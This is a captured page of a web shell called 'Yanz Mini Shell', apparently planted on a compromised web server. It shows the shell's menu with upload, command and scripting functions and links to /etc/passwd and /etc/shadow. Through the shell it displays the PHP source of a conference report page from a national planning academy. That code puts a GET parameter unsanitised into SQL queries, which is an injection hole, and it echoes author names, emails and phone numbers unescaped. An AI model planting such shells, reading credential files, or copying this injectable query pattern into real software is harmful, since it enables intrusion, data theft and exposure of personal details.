Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
naacpd
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php if(isset($_GET['proposal_id'])) $proposal_id=$_GET['proposal_id']; $get_information = $pdo->query("SELECT * FROM invitation_for_conference ORDER BY id_no DESC LIMIT 1"); $info_row = $get_information->fetch(); $get_invitation_no=$info_row["id_no"]; ?> <section class="content"> <div class="row"> <div class="col-sm-12"> <div class="box box-primary"> <div class="box-header with-border"> <h3 class="box-title"><?php if(!empty($main_menu)){ echo $main_menu;echo " <i class='fa fa-angle-right' style='font-weight:bold;'></i> ";} ?> <?php echo $menu; ?></h3> <div class="box-tools pull-right"> <style type="text/css" media='print'> @media print{ .printable{ font-size: 12px; } .logo{ margin-bottom: 20pt; } .break-before{ page-break-before: always !important; } .break-after{ page-break-after: always !important; } .no-break{ page-break-inside: avoid !important; } .with-border{ border: none !important; } .box{ border: none !important; box-shadow: none !important; } .table-data { overflow: visible !important; } #printPageButton { display: none; } } @media print { .no-print, .no-print * { display: none !important; } }th{ text-align:center; } .table-responsive{ } </style> <button id="printpagebutton" class="btn btn-success btn-xl" style="margin-left:5px; color:#FFF;" onclick="window.print();return false;" /> <i class="fa fa-print"></i> Print </button> </div> </div> <?php if($Type=="All_Proposal") { ?> <div class="box-body"> <table border="1" class="marking-table"> <tr class="report-header-area"> <td colspan="11"> <h2>National Accademy for Planning and Development</h2> <h3>Ministry of Public Administration</h3> <h3>List of Abstract submitted by Author for Conferece</h3> <p><?php echo $info_row["title"]; ?></p> </td> </tr> <tr class="header-row"> <td width="5%">Sl No</td> <td width="20%">Sub-Theme</td> <td width="75%">Absrtact Information</td> </tr> <?php $i=0; $get_mark = $pdo->query("SELECT P.*, M.* FROM article_proposal P, member_information M Where P.article_author=M.email AND P.invite_no='$get_invitation_no' ORDER BY P.related_topic"); while($mark_row = $get_mark->fetch()) { $i++; ?> <tr class="data-row"> <td><?php echo $i; ?></td> <td text align="left" style="padding: 10px;"><?php echo $mark_row["related_topic"]; ?></td> <td text align="left" style="padding: 10px; text-align: justify; line-height: 25px;">Title of the Absrtact : <?php echo $mark_row["article_title"]; ?><br><br>Name: <?php echo $mark_row["member_name"]; ?><br><span style="font-size: 13px;">Email : <?php echo $mark_row["email"]; ?><br>Phone : <?php echo $mark_row["phone_no"]; ?><br>Country : <?php echo $mark_row["country"]; ?></span><br><br><?php echo $mark_row["article_abstract"]; ?></td> </tr> <?php } ?> </table> </div> <?php }else if($Type=="All_Comment") { ?> <div class="box-body"> <table border="1" class="marking-table"> <tr class="report-header-area"> <td colspan="11"> <h2>National Accademy for Planning and Development</h2> <h3>Ministry of Public Administration</h3> <h3>List of Comment sent by Reviewer</h3> <p><?php echo $info_row["title"]; ?></p> </td> </tr> <tr class="data-row"> <td width="5%">Sl No</td> <td width="35%">Title of the Article</td> <td width="15%">Quality</td> <td width="15%">Comment</td> <td width="30%">Reviewer Name</td> </tr> <?php $i=0; $get_mark = $pdo->query("SELECT M.*, I.*, R.*, U.* FROM article_marking M, invitation_for_journal I, journal_proposal R, user_information U Where M.proposal_no=R.proposal_no AND R.invite_no=I.id_no AND M.reviewer=U.user_mail AND I.id_no='$get_invitation_no'"); while($mark_row = $get_mark->fetch()) { $i++; ?> <tr class="data-row"> <td><?php echo $i; ?></td> <td text align="left" style="padding: 10px;"><?php echo $mark_row["journal_title"]; ?><br><span style="font-size: 13px; font-style: italic;">(<?php echo $mark_row["journal_author"]; ?>)</span></td> <td text align="left" style="padding: 10px; text-align: justify; line-height: 25px;"><?php echo $mark_row["quality_of_article"]; ?></td> <td text align="left" style="padding: 10px; text-align: left; line-height: 25px;"><?php echo $mark_row["comment"]; ?></td> <td text align="left" style="padding: 10px;"><?php echo $mark_row["user_name"]; ?>,<br><span style="font-size: 13px; font-style: italic;"><?php echo $mark_row["address"]; ?></span></td> </tr> <?php } ?> </table> </div> <?php }else if($Type=="Single") { ?> <div class="box-body"> <table border="1" class="marking-table"> <tr class="report-header-area"> <td colspan="11"> <h2>National Accademy for Planning and Development</h2> <h3>Ministry of Public Administration</h3> <h3>Absrtact Submitted by Author</h3> <p><?php echo $info_row["title"]; ?></p> </td> </tr> <?php $i=0; $get_mark = $pdo->query("SELECT P.*, M.* FROM article_proposal P, member_information M Where P.article_author=M.email AND P.proposal_no='$proposal_id'"); while($mark_row = $get_mark->fetch()) { $i++; ?> <tr class="data-row"> <td text align="left" style="padding: 10px;"> Article Title: <?php echo $mark_row["article_title"]; ?><br><br> Author Name: <?php echo $mark_row["member_name"]; ?><br> <span style="font-size: 13px; font-style: italic;">(<?php echo $mark_row["article_author"]; ?>)</span><br><br><br> Absrtact: <br><br><?php echo $mark_row["article_abstract"]; ?><br> </td> </tr> <?php } ?> </table> </div> <?php }else if($Type=="Download") { ?> <div class="box-body"> <table border="1" class="marking-table"> <tr class="report-header-area"> <td colspan="11"> <h2>Download All Article for Conference Procedings</h2> </td> </tr> <tr class="header-row"> <td width="5%">Sl No</td> <td width="35%">Title of the Article</td> <td width="60%">Download Link</td> </tr> <?php $i=0; $get_mark = $pdo->query("SELECT P.*, M.* FROM article_proposal P, member_information M Where P.article_author=M.email AND P.invite_no='$get_invitation_no' AND P.proposal_status='Published'"); while($mark_row = $get_mark->fetch()) { $i++; ?> <tr class="data-row"> <td><?php echo $i; ?></td> <td text align="left" style="padding: 10px;"><?php echo $mark_row["article_title"]; ?></td> <td text align="left" style="padding: 10px;"><a href="../publication_file/<?php echo $mark_row["article_content"]; ?>"><i class="fa fa-download"> <?php echo $mark_row["article_content"]; ?></i></a></td> </tr> <?php } ?> </table> </div> <?php } ?> </div> </div> </div> </section> <style> th{ text-align:center; } .table-responsive{ overflow-x: hidden; } .view-table table tr:hover{ background: none; } .report-header-area{ text-align: center; } .report-header-area h2{ font-size: 22px; } .report-header-area h3{ font-size: 18px; margin: 5px; } .report-footer-area{ text-align: right; } .report-footer-area p{ font-size: 14px; } </style>
Free Space : 461903945728 Byte